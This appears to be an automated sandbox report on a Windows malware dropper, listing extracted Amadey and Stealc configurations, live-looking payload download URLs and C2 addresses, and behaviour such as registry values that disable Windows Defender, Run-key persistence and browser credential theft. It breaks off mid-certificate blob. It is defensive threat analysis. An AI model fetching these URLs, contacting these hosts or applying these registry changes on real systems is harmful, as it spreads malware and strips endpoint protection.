Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe
Resource
win10v2004-20250217-en
General
-
Target
9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe
-
Size
938KB
-
MD5
58d757fdef2c03ae9e2b9fecb544d1ce
-
SHA1
6eb6be030b0bb90d928592d22d67b20773e7ebba
-
SHA256
9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547
-
SHA512
60adfb3953c578cacc299edc18eb311868d93024ecdbe282a1ae1388de01c180400acabf7631e648070a89f89f310b1b73b78f36d93aa0d5658cbaaea139b894
-
SSDEEP
24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8a0Su:NTvC/MTQYxsWR7a0S
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3420-971-0x0000000000910000-0x0000000000D60000-memory.dmp healer behavioral1/memory/3420-970-0x0000000000910000-0x0000000000D60000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" dbc71c9fa1.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" dbc71c9fa1.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dbc71c9fa1.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" dbc71c9fa1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications dbc71c9fa1.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4973aedce1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bc5700b2c7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 978898b013.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e8fc92f40f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dbc71c9fa1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 14107dc962.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5ba84e592b.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2180 powershell.exe 8 1152 powershell.exe 9 2028 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3876 powershell.exe 3944 powershell.exe 2180 powershell.exe 1152 powershell.exe 2028 powershell.exe 1760 powershell.exe 264 powershell.exe 1192 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 3 IoCs
pid Process 1152 bitsadmin.exe 3516 bitsadmin.exe 3964 bitsadmin.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 32 1980 BitLockerToGo.exe 151 928 bc5700b2c7.exe 151 928 bc5700b2c7.exe 151 928 bc5700b2c7.exe 151 928 bc5700b2c7.exe 151 928 bc5700b2c7.exe 151 928 bc5700b2c7.exe 4 2180 powershell.exe 8 1152 powershell.exe 9 2028 powershell.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 7 2024 rapes.exe 15 1600 BitLockerToGo.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2836 chrome.exe 2196 chrome.exe 1192 chrome.exe 2304 chrome.exe 3280 chrome.exe 3896 chrome.exe 3224 chrome.exe 3200 chrome.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e8fc92f40f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e8fc92f40f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4973aedce1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bc5700b2c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 14107dc962.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bc5700b2c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dbc71c9fa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dbc71c9fa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 978898b013.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4973aedce1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5ba84e592b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5ba84e592b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 978898b013.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 14107dc962.exe -
Executes dropped EXE 28 IoCs
pid Process 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 2024 rapes.exe 808 SvhQA35.exe 1852 chromium.exe 1276 0e76db166d.exe 2644 TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE 760 483d2fa8a0d53818306efeb32d3.exe 1028 978898b013.exe 3004 51c7931c48.exe 2800 51c7931c48.exe 2328 14107dc962.exe 1360 5ba84e592b.exe 1088 e8fc92f40f.exe 1684 4973aedce1.exe 928 bc5700b2c7.exe 2500 f6a3f4768e.exe 3420 dbc71c9fa1.exe 3892 FvbuInU.exe 3368 OEHBOHk.exe 3776 zY9sqWs.exe 472 Process not Found 3924 ckonftponqgz.exe 3832 Y87Oyyz.exe 3384 Y87Oyyz.exe 3480 SplashWin.exe 3636 SplashWin.exe 3316 SvhQA35.exe 3424 chromium.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 4973aedce1.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine bc5700b2c7.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine dbc71c9fa1.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 14107dc962.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 5ba84e592b.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 978898b013.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine e8fc92f40f.exe -
Loads dropped DLL 64 IoCs
pid Process 2180 powershell.exe 2180 powershell.exe 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 2024 rapes.exe 808 SvhQA35.exe 1852 chromium.exe 2024 rapes.exe 1152 powershell.exe 1152 powershell.exe 2028 powershell.exe 2028 powershell.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 3004 51c7931c48.exe 1928 WerFault.exe 1928 WerFault.exe 1928 WerFault.exe 1928 WerFault.exe 1928 WerFault.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 1600 BitLockerToGo.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 1980 BitLockerToGo.exe 2024 rapes.exe 2024 rapes.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 2024 rapes.exe 3956 WerFault.exe 3956 WerFault.exe 3956 WerFault.exe 472 Process not Found 2024 rapes.exe 3832 Y87Oyyz.exe 3384 Y87Oyyz.exe 3384 Y87Oyyz.exe 3480 SplashWin.exe 3480 SplashWin.exe 3480 SplashWin.exe 3480 SplashWin.exe 3636 SplashWin.exe 3636 SplashWin.exe 3636 SplashWin.exe 2024 rapes.exe 3316 SvhQA35.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features dbc71c9fa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dbc71c9fa1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\4973aedce1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10103160101\\4973aedce1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\bc5700b2c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10103170101\\bc5700b2c7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\f6a3f4768e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10103180101\\f6a3f4768e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbc71c9fa1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10103190101\\dbc71c9fa1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\0e76db166d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10102580101\\0e76db166d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10102590121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3552 powercfg.exe 3544 powercfg.exe 3536 powercfg.exe 264 powercfg.exe 532 powercfg.exe 2564 powercfg.exe 2084 powercfg.exe 3528 powercfg.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4f9-180.dat autoit_exe behavioral1/files/0x000400000001cbfc-776.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 2024 rapes.exe 2644 TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE 760 483d2fa8a0d53818306efeb32d3.exe 1028 978898b013.exe 2328 14107dc962.exe 1360 5ba84e592b.exe 1088 e8fc92f40f.exe 1684 4973aedce1.exe 928 bc5700b2c7.exe 3420 dbc71c9fa1.exe 3892 FvbuInU.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3004 set thread context of 2800 3004 51c7931c48.exe 67 PID 1028 set thread context of 1600 1028 978898b013.exe 70 PID 2328 set thread context of 1980 2328 14107dc962.exe 74 PID 3924 set thread context of 1064 3924 ckonftponqgz.exe 164 PID 3924 set thread context of 4020 3924 ckonftponqgz.exe 170 PID 3636 set thread context of 4092 3636 SplashWin.exe 176 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3728 sc.exe 3344 sc.exe 3560 sc.exe 4080 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1928 3004 WerFault.exe 66 2172 1684 WerFault.exe 77 3956 3776 WerFault.exe 133 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 51c7931c48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e8fc92f40f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5ba84e592b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dbc71c9fa1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc5700b2c7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 51c7931c48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f6a3f4768e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 14107dc962.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f6a3f4768e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4973aedce1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0e76db166d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 978898b013.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6a3f4768e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bc5700b2c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bc5700b2c7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2612 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2612 taskkill.exe 2380 taskkill.exe 876 taskkill.exe 2596 taskkill.exe 1688 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10aeebc3d68ddb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7